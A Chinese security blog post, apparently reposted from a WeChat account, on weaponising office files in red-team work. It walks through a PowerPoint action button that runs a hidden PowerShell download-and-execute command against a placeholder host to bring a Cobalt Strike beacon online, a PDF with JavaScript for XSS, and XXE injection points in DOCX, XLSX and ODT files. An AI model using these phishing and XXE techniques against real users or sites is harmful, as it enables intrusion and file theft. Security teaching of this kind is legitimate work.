实战攻防中关于文档的妙用

admin 2023年4月18日21:14:24评论41 views字数 1766阅读5分53秒阅读模式

扫码领资料

获网安教程

免费&进群

实战攻防中关于文档的妙用
实战攻防中关于文档的妙用

Track安全社区投稿~

千元稿费!还有保底奖励~

一、PPT钓鱼

  1. 简单制作一个用于钓鱼的PPTX文件

一般那种小白不知道PPT也能拿来钓鱼,这里主要是借用PPT中的”动作按钮”,
我们在插入的地方,选择“动作按钮

实战攻防中关于文档的妙用

然后在弹出的窗口处:

实战攻防中关于文档的妙用

比如填入上线CS的语句:
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"
最后我们将ppt格式保存为ppsx格式,打开即可上线

实战攻防中关于文档的妙用

二、PDF在漏洞挖掘和红队中的一些攻击姿势

使用PDF进行XSS攻击【这个有点鸡肋,只是一种思路】
一个也不算新的攻击点,它的攻击场景其实说常见也常见说不常见也不常见,如果在日常日站中能遇到一些站的文件上传允许上传PDF,能在线解析上传的PDF,用户可以在线浏览PDF文件的,那么久可能存在XSS攻击漏洞,废话不多说,我们来制作一个恶意PDF文件,方法如下:
找一个PDF编辑器,我这边用的是迅捷,其他的编辑器应该是差不多,点击左上角选择新建空白页

实战攻防中关于文档的妙用

单机左侧的“页面“标签,选择与之对应的页面缩略图,然后从选项下拉菜单中选择“页面属性”命令

实战攻防中关于文档的妙用

也可以在这个位置找到

实战攻防中关于文档的妙用

在“页面属性”对话框单击“动作”标签,再从“选择动作”下拉菜单中选择“运行 JavaScript”命令,然后单击【添加】按钮,弹出 JavaScript 编辑器对话框

实战攻防中关于文档的妙用

在弹出的“JavaScript 编辑器”对话框中输入代码:
app.alert(‘XSS’);

实战攻防中关于文档的妙用

我们保存后,用浏览器打开这个pdf文件[]

实战攻防中关于文档的妙用

三、使用Word文档进行XXE攻击

1、DOCX文档的构造
使用docx文档进行xxe攻击,一般小白听都没听过,就感觉很高级的赶脚,其实ta的原理非常简单,打过CTF比赛的小伙伴们应该都知道docx本质上是压缩包,是把一堆xml文件按照一定格式压缩在一起

实战攻防中关于文档的妙用

下图可以清晰的看到DOCX文档的实际构成

实战攻防中关于文档的妙用

既然是xml文件,我们知道xxe攻击的本质上就是后端在处理XML相关数据的时候也执行了我们的恶意XML语句,那么我们可以把恶意语句嵌入到DOCX文档中的某些xml文件中,想办法让网站触发
这个方法的关键点在于,要去寻找那种网站本身可以阅读DOCX文档或者在线解析DOCX文档的功能,一定绕不开解析DOCX文档里的XML文件,所以那种网盘在线阅读DOCX文档、网站在线解析DOCX文档、邮件系统传输DOCX文档等等功能都有可能存在这类漏洞,下面讲讲利用姿势

  • 第一个回显位置
    这个位置在word/document.xml文件中
    把它打开后发现是这样的

实战攻防中关于文档的妙用

第一个位点在文档声明的下方,也就是这个位置

实战攻防中关于文档的妙用

可以嵌入恶意代码,比如:

实战攻防中关于文档的妙用

然后将这个压缩包的后缀改为DOCX,就获得了一个用于xxe攻击的DOCX文档

  • 第二个回显位置
    这个功能点所处的位置是docProps/app.xml

实战攻防中关于文档的妙用

可以清楚的看到控制页码的标签是

实战攻防中关于文档的妙用

在Pages标签中嵌入XXE攻击语句即可

实战攻防中关于文档的妙用

然后和上面一样将这个压缩包的后缀名修改为DOCX,就得到了一个用于xxe攻击的DOCX文档
2、利用Word OLE功能进行XXE攻击
这个手法主要用于攻击Libreoffice,Libreoffice是很多Word转PDF网站的常客,实战情况下有机会遇到
先创建一个OLE对象

实战攻防中关于文档的妙用

选择由文件创建

实战攻防中关于文档的妙用

这个文件名的绝对路径可以自己填,插入好之后将这个文档先保存为.odt格式

实战攻防中关于文档的妙用

然后老样子,把它后缀改为.zip格式再修改其中的XML文件,在content.xml中找到第一个xlink:href 其中的路径修改为你想要读的文件

实战攻防中关于文档的妙用

最后把它重新改成Docx格式即可

四、使用Excel文档来进行XXE攻击

使用Excel文档进行XXE攻击的原理基本与Word文档进行攻击的原理一致,Excel文档也是由XML文件按照一定的格式压缩在一起的。它们的输出位点也非常相似,把xlxs文档后缀改为zip,找到xl/workbook.xml文件。

实战攻防中关于文档的妙用

同样在XML声明行的下面有一个输出位点

实战攻防中关于文档的妙用

填入恶意语句
将压缩包后缀重新改回xlxs文件即可得到一个恶意Excel文件

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

实战攻防中关于文档的妙用

原文始发于微信公众号(掌控安全EDU):实战攻防中关于文档的妙用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月18日21:14:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战攻防中关于文档的妙用https://cn-sec.com/archives/1677713.html

发表评论

匿名网友 填写信息